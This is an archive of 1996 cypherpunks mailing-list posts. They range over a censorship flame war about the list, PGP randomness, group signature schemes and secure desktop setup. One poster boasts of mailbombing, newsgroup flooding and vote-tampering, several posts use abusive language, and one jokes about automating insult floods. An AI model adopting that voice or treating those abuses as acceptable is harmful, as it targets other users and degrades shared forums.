No, he is saying that people can use an e-mail filter and not listen
to Vulis if they want to.  It was a very simple thing; are you too
uneducated to know how to use an e-mail filter?


  Any idiot can use an email filter-he knows that.  Again-on our
mailing list he's not worth the effort-let's take the subject and 
their mailing list to usenet.

                                       Steve

> By the way, if you haven't figured it out yet, Mr. "Freedom Knight of
> Usenet,"  a private mailing list is NOT Usenet. Get a clue. 
> 

Wrong!  The cyberpunks mailing list is PUBLIC property and should
NOT be controlled by John Gilmore!  This just goes to show the real
facist censorship motives that the EFF has behind it.

Time to kill the EFF, and let it rot in hell.  They are disgrace
to the entire InterNet community.  I run 6 different mailing lists,
and have NEVER puled the plug on anyone, even when they criticize me.

The first time is the time when you lose all credibility, and there
is never any forgiveness for a plug-puller.


> -Declan
> 

-aga.admin
InterNet Freedom Council
> 
> 
> 
> 
> 
> On Wed, 13 Nov 1996, Dave Hayes wrote:
> 
> > [This is a rebuttal to a misguided news article.]
> > 
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)
> > 
> > Thank you for leaving your email address. It makes this easier.
> > 
> > You people (read: the unaware and hypnotized masses, which includes
> > reporters who's desire for attention and political safety holds them
> > in line with the consensual illusion) keep missing the real issue, and
> > substituting issues which only hold themselves in place.
> > 
> > [Those of you who know, please excuse the mediaistic terms used in
> > this rebuttal. One must use the symbols one is given to communicate
> > at the level of understanding of those who use them.]
> > 
> > >        Thus began a debate over what the concept of censorship means in 
a
> > >    forum devoted to opposing it. Did Gilmore have the right to show 
Vulis
> > >    the virtual door? Or should he have let the ad hominem attacks
> > >    continue, encouraging people to set their filters accordingly? The
> > >    incident raises deeper questions about how a virtual community can
> > >    prevent one person from ruining the forum for all and whether only
> > >    government controls on expression can be called "censorship."
> > 
> > "Cyberspace" is interacted with using tools under the control of the
> > interactor. 
> > 

yes, and all you need is a simple mail filter.

> > In person-to-person interaction, one's only real defense against what
> > one decides to call "unwanted" is to remove oneself from the arena of
> > interaction. It may not be possible to ignore or run away from certain
> > sources of input. 
> > 
> > In cyberspace, however, it is not only possible but necessary and even
> > desirable. Cyberspace allows one to interact with many more people
> > then can fit in any given physical space. One simply -cannot- receive
> > input from 2000 people and not employ some sort of filtering
> > mechanism. Indeed, cyberspace has many buttons and switches (and even
> > programmatic filters) which allow one to -completely- control whom one
> > interacts with.
> > 
> > Logically, we must conclude that those who frequently and repeatedly
> > cry for the censorship or removal of any source of input from
> > cyberspace are either:
> > 
> > 	-quite clueless about the tools at their disposal
> > 	-ideologically or personally opposed to the source of input
> > or	-in need of large amounts of attention from others
> > 
> > Cluelessness can be overcome by appropriate teaching and interest in
> > learning (the latter issue we can safely assume users of popular but
> > ineffectual windowing OSes are not able to overcome). Such
> > cluelessness, however, is not and should never be a reason for 
> > censorship.
> > 
> > A need for attention can be overcome by refraining from the denial
> > that the need exists, followed by careful observation of that need. 
> > More can be said on this, but this is not the forum. Such a need
> > is not and should never be a reason for censorship. 
> > 
> > Idelological opposition is another matter entirely. To understand this
> > better, we'll need to observe this in action. Here is an example:
> > 
> > >        Vulis portrays himself as a victim, but as I posted to the list
> > >    last week, I disagree. Anyone who's spent any time on the
> > >    100-plus-messages-a-day list can read for themselves the kind of 
nasty
> > >    daily messages that came from Vulis's keyboard. 
> > 
> > "Nasty" is, of course, by this reporter's standard of "nasty". Granted
> > this standard may in fact be shared by Mr. Gilmore, however a shared
> > standard is not necessarily an appropriate or correct standard. 
> > 
> > >    The list is on Gilmore's machine and he can do what he wants with
> > >    it; he can moderate the postings, he can censor material, he can
> > >    shut the whole thing down. By kicking off an offending user, a
> > >    list owner merely exercises his property right. There's no
> > >    government involvement, so the First Amendment doesn't apply. And
> > >    the deleted, disgruntled user is free to start his own mailing
> > >    list with different rules.
> > 
> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
> > 
> > What would ideological opposition be without the attempt at analogy? 
> > Here we witness another example:
> > 
> > >        But then the question is whether Gilmore should have exercised
> > >    that right, especially in such an open forum. Again, I think 
Gilmore's
> > >    actions were justified. Consider inviting someone into your home or
> > >    private club. If your guest is a boor, you might ask him to leave. If
> > >    your guest is an slobbish drunk of a boor, you have a responsibility
> > >    to require him to leave before he ruins the evening of others.
> > 
> > Notice that the net is compared to a home or private club. Actually
> > the net is neither, however that would not serve the purposes of this
> > analogy, so this fact is convienently forgotton. 
> > 
> > The net is a wonderful place. Any ideology, no matter who disagrees or
> > agrees with it, can be expressed and discussed here...assuming those
> > who oppose this ideology do not have their way with the source of
> > expression. There is a more refined and deeper truth to be found
> > in the very existence of the set of all human ideologies, which is
> > just beginning to show itself to some netizens. Unfortunately, this
> > truth can be ruined when people equate some notion of value to 
> > sources which ignore all but a tiny subset of the set of all ideologies:
> > 
> > >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> > >    lists and has kicked people off to maintain better editorial control.
> > >    Volokh says that the most valuable publications are those that
> > >    exercise the highest degree of editorial control.
> > 
> > Value to whom and for what? If the editorial control produces one
> > small element of the set of all ideologies, then this is only of value
> > to the people who support this ideology. Given that the set of 
> > people who support an issue is smaller than the set of people
> > who support and oppose an issue, would the value not increase
> > by allowing both sides of an issue equal speaking time? 
> > 
> > >        For his part, Gilmore calls removing the Russian mathematician 
"an
> > >    act of leadership." He says: "It said we've all been putting up with
> > >    this guy and it's time to stop. You're not welcome here... It seemed
> > >    to me that a lot of the posts on cypherpunks were missing the mark.
> > >    They seemed to have an idea that their ability to speak through my
> > >    machine was guaranteed by the Constitution."
> > 
> > It is sad to note that this is the leader of one of America's
> > forerunning organizations of freedom who says these words. For all
> > *his* ideology of free speech, this statement reveals the hypocrasy he
> > lives with for all to see. The true litmus test of free speech is to
> > encounter speech that you *want* to censor.
> > 
> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?

Indeed.  The EFF is a disgrace to the entire InterNet.
The EFF is definitely a censorship organization, and
it should never be trusted again.

> > ------
> > Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> > Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> > 
> > Truth (n.) - the most deadly weapon ever discovered by humanity. Capable 
> > of destroying entire perceptual sets, cultures, and realities. Outlawed 
> > by all governments everywhere. Possession is normally punishable by death.
> > 
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 14:06:37 -0800 (PST)
To: aba@dcs.ex.ac.uk>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b0faeb28e92a655@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:02 PM 11/15/1996, Bill Frantz wrote:
>At  1:44 PM 11/13/96 +0000, Adam Back wrote:
     ^^^^^^^^^^^^^^^^^^^^^^
>> A very good idea.  There was some discussion of this kind of thing a
>> while back about doing this for Singapore.  The suggestion at the time
>> was not to do it perfectly, but rather to arrange something simple to
>> allow people to circumvent the censorship enforced through their
>> compulsory use of a government censored web proxy.

> I hope it is ready.  To quote from William Safire's 11/14/96 NYT column:
                                                      ^^^^^^^^

> "Let's run a test.  "Information Technology and Political Control in
> Singapore" is a paper just issued by Prof. Gary Rodan of Murdoch University
> in Perth, Australia, distribued by Chalmers Johnson of the Japan Policy
> Research Institute in Cardiff, Calif.  It's on this web site:
> http://www.nmjc.ord/jpri/.

> "If Lee blocks access, Singaporeans, try E-mail: cjohnson@ucsd.edu.  But be
> careful, global business executives: the Architect of the New Century [Lee
> Kuan Yew - wsf] may be monitoring everything you download."

Guess Safire hits the Cypherpunks list when he needs material!

Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 15 Nov 1996 14:10:07 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Leadership and Inscrutable Deficiencies
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961115220908Z-7244@INET-01-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Vladimir Z. Nuri, in his Ancient Warrior mode:

I think many people need to learn a lesson that cyberspace doesn't
change certain basic realities, such as how important a dynamic leader
is in forward motion in any area. but they
will have plenty of opportunities to learn over the next few years and
decades. and I'll be snickering in the sidelines as long as they wonder
aloud why their realities are as they are and they find the deficiencies
therein inscrutable.
.....................................................

Oh, Nuri, you're so Morally Superior and so far above us, being more
"up" than anyone on inscrutable deficiencies.    I find it incredible to
realize that it will take *years* in cyberspace before I learn about the
immutability of basic realities (and maybe about the Incommensurability
of the Diagonal, too).  

Definitely it will be a very, very long time before I feel the need of
being led (around, by the nose?), in place of exercising self-control
and reasoned judgement.


   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Nov 1996 11:28:03 -0800 (PST)
To: hallam@vesuvius.ai.mit.edu
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <9611151718.AA02034@vesuvius.ai.mit.edu>
Message-ID: <Pine.LNX.3.95.961115141513.813A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Nov 1996 hallam@vesuvius.ai.mit.edu wrote:

> >Note that the libertarian party is the only
> >non-mainstream party in history to get a candidate registered in all 50
> >states
> >twice in a row. 
> 
> Untrue, Ross Perot managed it and gained ten times the votes.
> Also the natural law party managed it, a fact which kida points
> to the significance of the achievement. 

Ross Perot isn't a political party.  The Natural Law Party most certainly did
not get registered in all 50 states twice in a row.  This is only their second
election and they only got registered in 36 states in 1992.  Ross Perot may
have gained ten times the votes, but he did it with 100 times the money.  He
also accepted matching funds.

> 
> >It's also the third largest political party in the country.
> 
> Also untrue, the Reform party is a considerably more significant 
> force. 

The Libertarian party has branches in all 50 states and has run candidates for
the senate and representatives.  The Libertarian party's homepage does say
that they are the third largest political party and the Reform party's page
does not seem to have any info on number of members or anything that would
contradict the Libertarian party's claim.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMozEsCzIPc7jvyFpAQHwvAgAgsY/u51gi5Di9UkgoT3YrghHjRyLq7Aw
lxeFPzkZ2WcNGqE8Hs8p8K0zf/sykANoHiO7hA4afTAKgAu2MtIRgiGTyxEz186Z
wmfKohkYLDiDWchXHKdjU/u9ll+jmlH2Frnc29baaSG+mWDEKWIB4cQkZHL0hD/c
CWXX4Acyi1kHC/AIM1TKDne2Taf7JMOzOXiRgR31P94zwjZyQ3QcfPWfG99Yk/gn
lp9drlH7jIM/8KciJh1O1/Kfuu75uitAyk/VDXJET10FtVVJa5h+YU/82AYlwuNk
jHEr8GUxkkQyN+aXLWW4Pjvc+nrlM50D41DTgHPJ8/rf8ATYORfcNQ==
=vUos
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Fri, 15 Nov 1996 14:47:28 -0800 (PST)
To: ddt@pgp.com
Subject: Re: One Big Telecoms Company
In-Reply-To: <3.0b36.32.19961115075321.006e0500@panix.com>
Message-ID: <v03007810aeb2a32160e2@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain


>At 07:02 PM 11/14/96 -0800, Dave Del Torto wrote:
>
>There are now 150 Long Distance telephone companies in the US vs 1 when I
>was a kid.
>
>There are now 5 or 6 broadcast and 150 cable TV networks in the US vs 3
>when I was a kid.
>
>There will soon be 5 cellular and PCS companies in NYC vs 0 when I was a kid.
>
>There are now 6000 ISPs vs 0 when I was a kid.
>

Better grow up quick, Dave, I can't take much more change.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 15 Nov 1996 11:48:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Playing Cards
In-Reply-To: <v02140b03aeb239f7c4bb@[192.0.2.1]>
Message-ID: <Pine.LNX.3.95.961115143422.813B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Nov 1996, Peter Hendrickson wrote:

> (My apologies to those who are seeing this twice.  I sent it
> yesterday but it does not seem to have made it through.)
> 
> A number of us have been concerned about how PGP generates entropy.
> Striking the keyboard beats using time as a source of random numbers,
> but the degree of entropy is not well understood.  Are there machines
> where - for some reason - the keyboard strikes fall into some sort
> of pattern?
> 
> And that's just when you are generating your public/private key pair.
> What happens when you are just generating 128-bit keys for individual
> messages?  Where is the entropy coming from?  I don't understand
> completely, but somehow PGP collects entropy from the system and then
> runs it into IDEA and then uses the numbers from the output.  When the
> program is not running, a pool of this data is kept in randseed.bin.

PGP uses the hash of the message to preprocess the randseed.bin file and
postprocesses it with the session key.  It uses the randseed.bin file as
a PRNG to generate the session key.

> We already know it's a problem because it is hard to understand what
> it is even doing, much less determine if it is consistent with sound
> engineering practice.

PGP uses a variation of ANSI X9.17 for key generation.  This is considered to
be a secure method.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMozI/CzIPc7jvyFpAQG+NAgAvPWsnTb7S/ohtHcyQG8DCaSlKtHt+FMF
4qtLNtBzi8Y27WRtl9HHojdgYGVxuT45e4W9r3WOtLjaMkrYPdIKUcxSABkhr3Zd
03pfVePg/ws3p+ynmpInMj8vr3lAYPlcFp5cPJdKl8WhZTSxXFCQ92q7xckzoW5S
J9iUiIgnYf8n7qcfNSQI9rVw2d3Dv6rccqdYtfNA+UUe6jlwIbooITZ89EhVHWzw
2BTZF+xOVenK058uQQFIzU99Bkaz35Hl3CC41TX/Ka2CZXBhAzjD++xtcapu1PE7
moEzKde5cgYZ+R1d7TZwvudkAtdlx7xo4GDfxI5O+KR+FOyDNqMdoQ==
=JTNn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 15 Nov 1996 15:01:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <l03010605aeab7149a687@[152.3.87.2]>
Message-ID: <v03007805aeb2a4bb46e0@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Adam Gulkis <lordvidarr+@CMU.EDU> writes:
>a locked startup disk is not a good idea, if it is even possible.
>Most applications setup scratch space on the startup volume.

And it is this sort of scratch space which the user does not want
to have on the unencrypted partition.  Unless the _system_ requires
writable area on the startup volume there is no disadvantage to locking
that volume.  Once the system is up and running use alias folders in the
system folder for those apps which are inconsiderate enough not to
ask you where they will be creating temp space.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 15 Nov 1996 15:03:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b02aeb235099c35@[192.0.2.1]>
Message-ID: <v03007804aeb2a16c7fc4@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Lucky writes:
>
>> At 9:32 AM 11/15/1996, Adam Shostack wrote:
>> I've been toying with schemes that multiply the Ns from everybody's
>> public key to create a new semi-anonymous public key.  The only
>> problem is that in each case either identity is revealed or the
>> person seeking semi-anonymously reveals their secret key.  So,
>> I am not quite there.  ;-)
>
>I think that Chaum wrote some papers on group signatures. I'll try to dig
>them out. But it probably won't be before Sunday.

There are several types of "group signature" schemes out there.  The one
which Chaum wrote about was signatures which require a group to perform
verification of the signature in relation to his undeniable signature
system (Lidong Chen advanced this a bit further to make the scheme more
general.)  There are also systems in which group or subset of a group is
necessary to sign the message, the original work was by Yves Desmet in his
paper "Social Cryptography" in Crypto 88 or 89 I think.  There have been
various advancements on these systems, with different threshold schemes
applied, the ability to have "super-votes" among the shares or veto schemes,
mechanisms using distributed computation to securely perform the signing
or encryption, as well other bells and whistles.  At one point I was thinking
about such systems in the context of the DNSSEC work as a means for creating
a pseudonymous top-level domain with the same mechanisms for adjudication and
dispute resolution as the current system through group signatures but had to
set it aside to work on something a bit more practical.  If anyone is really
interested I could probably put together a fairly comprehensive listing of
the literature in this particular area...

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Gulkis <lordvidarr+@CMU.EDU>
Date: Fri, 15 Nov 1996 12:11:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
In-Reply-To: <l03010605aeab7149a687@[152.3.87.2]>
Message-ID: <0mXAsVG00YUo0KeqY0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


a locked startup disk is not a good idea, if it is even possible.
Most applications setup scratch space on the startup volume.  It would
be a better idea to setup a partition for applications and lock it, if
you feel that is necessary.  Norton DiskLock is a nice tool that
provides a startup password protection as well as screensaver
password.  It will request a password if the machine sleeps or to
reboot after a crash.

A. Gulkis
-------------------------------------------------------------------
Electronic and Time Based media? whats that?
                                http://valhalla.res.cmu.edu/vidarr/
President, Screaming Viking Research Labs
                                Reinventing Perceptions of Reality
pgp key: finger vidarr@valhalla.res.cmu.edu		
-------------------------------------------------------------------

tom bryce <tjb@acpub.duke.edu> writes:
> Here's a question: if one were designing for oneself a secure personal
> computer system, for use in, say, word processing, spreadsheet,
> communications, the usuals - what system would one purchase and how would
> one set it up?
> 
> For example, on the Mac I would envision this as the ideal system:
> 
> (1) Get a power mac
> (2) Partition the hard drive into two partitions:
>     install the system folder on one and a copy of CryptDisk
>     make this the startup partition and make it READ ONLY with aliases to
>     folders you want to be modiyfable (such as Eudora Folder in the sys folder)
>     place these folders on the encrypted partition
> (3) Completely fill the other partition with a CryptDisk file so there is no
>     room for other stuff to be written. Adjust the partition size if needed.
> (4) Install a screen saver (such as shareware Eclipse) that will password lock
>     the screen after a few minutes of inactivity, and set CryptDisk to dismount
>     the external partition after a few minutes of inactivity (or longer)
> 
> This would be a basic setup. If one had more complex ideas, such as setting
> it up so casual onlookers would not notice the system was protected, you
> could do things like have a decoy normal partition with system folder to
> boot from by default, to be bypassed with an external locked system folder
> disk, after which one could dismount the decoy partition and mount the
> encrypted partition.
> 
> If locking the startup volume turns out to be too much of a pain, one could
> install trashguard from Highware software and set it to triple overwrite
> deleted files, and otherwise not lock the startup partition.
> 
> How would things work on Windows 95? I imagine most of the old DOS-based
> encryption utilities may have compatibility problems with W95. What would a
> similar ideal system be for a PC?
> 
> Tom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 15 Nov 1996 15:14:37 -0800 (PST)
To: Adam Gulkis <cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
Message-ID: <199611152314.PAA06897@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:10 PM 11/15/96 -0500, Adam Gulkis wrote:
>a locked startup disk is not a good idea, if it is even possible.

A system file and boot blocks you know can't be written to is a wonderful
aid to a comfortable sleep.  For a number of things, I would like to boot
off CDROM.  (E.g. the program which checks the cryptographic hash of all
the executables on my hard drive and delivers me a report.)


>Most applications setup scratch space on the startup volume.

It would be better if they set up scratch space on the writable volume with
the most available space.  VM/CMS provided a system call to to this in the
late 1960s/early 1970s.  "Modern" systems should provide a similar service.


>It would
>be a better idea to setup a partition for applications and lock it, if
>you feel that is necessary.  Norton DiskLock is a nice tool that
>provides a startup password protection as well as screensaver
>password.  It will request a password if the machine sleeps or to
>reboot after a crash.

Protection against strangers walking up to your machine and using it is
nice, and easy to do.  Protection against viruses which install Trojan
horses in your system would also be nice, but is very hard to do in systems
where programs run with all the privileges of their users.  Examples
include (in alpha order): DOS, MacOS, Unix, and Windows (including NT).


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Fri, 15 Nov 1996 15:14:36 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961115071542.2693G-100000@dhp.com>
Message-ID: <Pine.LNX.3.95.961115150539.8326C-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


So, you send all of your snail mail on post cards do you? No
sealed envelopes at all? Afterall you have nothing to hide, right?

Of course not, privacy isn't about being a criminal, its about being
private. It is not akin to anonymity, *perhaps* those who work
anonymously have `something to hide' (still doesn't necessarily make
them a criminal, however), I'll let someone else field that as I feel
that anonymity is rarely a good thing. 

Privacy, on the other hand, simply means that not everything I do is any
of your business and I would just as soon you not be tempted to even
bother trying to find out. 

Of course, if all of your personal mail (including financial statements
etc) is sent on post cards, then (while I think you would be crazy) I
will at least admit you are consistent. Else, I think you need to look
hard at the logic you are using.

cheers


On Fri, 15 Nov 1996, aga wrote:

> On Thu, 14 Nov 1996, Sean Roach wrote:
> 
> > Date: Thu, 14 Nov 1996 19:46:08 -0500
> > From: Sean Roach <roach_s@alph.swosu.edu>
> > To: aga <aga@dhp.com>, cypherpunks@toad.com
> > Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> > 
> > >On Wed, 13 Nov 1996, Mark M. wrote:
> > 
> > >> Mark
> > >> - -- 
> > >> finger -l for PGP key
> > >> PGP encrypted mail prefered.
> > 
> > To which, at 08:42 AM 11/14/96 -0500, aga wrote:
> > 
> > >Why?  Are you a criminal?
> > >What are you hiding behind your PGP?
> > 
> > Okay, I'll bite.  Where is it said that a person who wants h[is,er] privacy
> > is a criminal?  Charlie McCarthy might have said that.
> > 
> 
> It just "looks" that way on the net.  I do live-fucking, newsgroup
> flooding, mailbombing, vote-tampering and defamation all legally,
> and OPENLY on the InterNet.
> 
> The more you PGP, the worse you look.  Nobody reads your e-mail,
> so stop being so paranoid.
> 
> -aga
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 15 Nov 1996 15:28:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Reminder -- DCCP Meeting on Saturday, November 16
Message-ID: <Pine.SUN.3.91.961115152753.17166A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain






---------- Forwarded message ----------

WHAT: DC Cypherpunks Meeting

WHEN: Saturday, November 16, 1996 @ 3 pm

WHERE: 1050 Connecticut Ave NW, Suite 850, Washington, DC
       (Between K and L streets)

WHO: From phone on eighth floor, call to be let in

WHY: A description of the crypto protocols used in the SET (Secure
     Electronic Transaction) standard
     
     A PGP key signing
     
HOW: Take the orange/blue line to Farragut West, walk two blocks north
     (past the park), 1050 Conn. Ave will be on left
     
     Take the red line to Farragut North, exit on L street at base
     of 1050 Conn. Ave
     
     From Baltimore, take BaltWashExpy south. It turns into New York
     Avenue, which turns into Massachusetts Avenue. Take Mass. Ave
     westbound to Dupont Circle. Then take Connecticut Avenue southbound.
     1050 Conn. Ave will be about four blocks away on your right.

MORE INFO: http://www.isse.gmu.edu/~pfarrell/dccp/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 15 Nov 1996 15:36:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <Pine.3.89.9611151034.A15706-0100000@netcom14>
Message-ID: <v03007807aeb2ac971fb2@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
>[...] There are also systems in which group or subset of a group is
>necessary to sign the message, the original work was by Yves Desmet in his
>paper "Social Cryptography" in Crypto 88 or 89 I think.

Correction:  That should have been "Society and Group Oriented
Cryptography: A new approach" by Yves Desmedt in Crypto '87  [It
was sitting next to my desk and I was too lazy to reach over and
check...sigh.]  This particular paper deals with groups recieving
messages and requiring a subset to decrypt, a later paper by Desmedt
(or maybe Desmedt and Yao) deals with the signature system I
described.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Fri, 15 Nov 1996 12:42:45 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re: your mail
In-Reply-To: <9611140239.AA16352@cow.net>
Message-ID: <Pine.SCO.3.93.961115150059.22054E-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Bovine Remailer wrote:

> Foulmouthed <name snipped> rehashes his lies like a rabid parrot choking
> on a stale mantra stuck in its poisonous beak.

Obviously, we're taking "<user name> sucks" messages to a new level.
The author seems to be striving for some display of literary prowess,
albeit one that's a tad heavy on similes.

So that we can all save some time (why use valuable time to think of "you
suck" messages, when you can just have the computer build them for you?),
perhaps folks should take a look at the "Chomskybot" that's running at
"http://www.ling.lsa.umich.edu/cgi-bin/chomsky.pl".  Being familiar with
Noam Chomsky helps, but most everyone will see the value of what the site
has to offer.

By changing the initiating, subject, verbal and terminating phrases, the
Chomskybot should be able to provide exactly what's needed when trading
insults with other Cypherpunks.  We can have contests for "Best of Breed" 
(hell, we *already* have contests, it's just that nobody ever wins any
prizes), and "genre" categories based on upcoming events, holidays,
political headlines, etc.  Eventually, someone will link the Perl code
into procmail or cron, and we can have a new "<user name> sucks" message
automatically mailed to the list every few seconds by battling Cypherpunk
super-computer-powered "clans".  When enough automated insults fill the
list, human interaction will simply cease and then we can all enjoy the
enormous amounts of free time that we'll have since we won't actually
have to read anything any longer. 

So, we got any Perl programmers out there?

------------------------------------------------------------------------- 
|It's a small world and it smells bad     |        Mark Aldrich         |
|I'd buy another if I had                 |   GRCI INFOSEC Engineering  |
|Back                                     |     maldrich@grci.com       |
|What I paid                              | MAldrich@dockmaster.ncsc.mil|
|For another mother****er in a motorcade  |Quote from "Sisters of Mercy"|
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 16 Nov 1996 02:58:59 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Members of Parliament Problem
Message-ID: <848137382.624190.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Is there a way to take published public keys and combine them with
> your own in such a way that your identity is not compromised, but
> it is clear beyond a doubt that you control one of a set of public
> keys?

An obvious solution would be a shared public key/private key pair 
between a number of users then use them for digital signatures and 
route the messages through an anonymous server.


You could also have an arbitrated blind signature protocol whereby 
trent shares a keypair with all users. bob encrypts his comment, M 
with the key he shares with trent. On recieving it trent carries out 
a blind signature on it and publishes it, as trent knows only bob has 
the shared key, K he knows bob said M but as it is a blind sigature 
and he is likely to be signing a lot of messages (trent is of course 
a computer program) he doesn`t know which message came from bob.

Also Chaums group signatures could be used but unfortunately the 
arbitrator can find out who said what, but does not normally know.
Also trent can forge digital signatures with this protocol.
Chaum further mentions protocols for this sort of thing that do not 
even need an arbitrator but I don`t have the papers on this.


  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQCVAwUBMoyPCr5OPIRbv66xAQE6pQQAvs/NVY8s6Uid186CAQf8Q+iZucYtzRM7
iNjR0RkiNMnYACgHG0NO9UfkPgKGdomMQrGJFubH9O2/fnbMAIGZh8gv+k9P7iYl
5lMfCtCQe4AgeCyS2YRLMEYQiI6MAqWn4HoTzA58gWRbtOHeIZNpw/vc/hTqBbA7
3sDsOGYqqCk=
=kiS8
-----END PGP SIGNATURE-----

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 15 Nov 1996 15:54:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Validating SSNs
In-Reply-To: <v03007801aeb10f2b94a1@[207.167.93.63]>
Message-ID: <328D0286.4075@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Indeed, I protected my privacy decades ago by discarding my issued SSN 
> and substituting a different one. This "phony SSN" is what I use on my 
> tax returns, my credit cards, and for my employers.
> 
> Ha! None of them know that this is not my True Social Security Number!
> 
> By this I protect my privacy.

Brilliant! Little do they know that when they analyze your spending 
patterns, your addresses, your employment, your education, and your 
kids, they're really investigating something that has NOTHING TO DO WITH 
YOU!

[Just in case there are people too thick to understand "subtlety."] 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 15 Nov 1996 16:02:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Members of Parliament Problem
In-Reply-To: <v02140b01aeb1a0ff57d2@[192.0.2.1]>
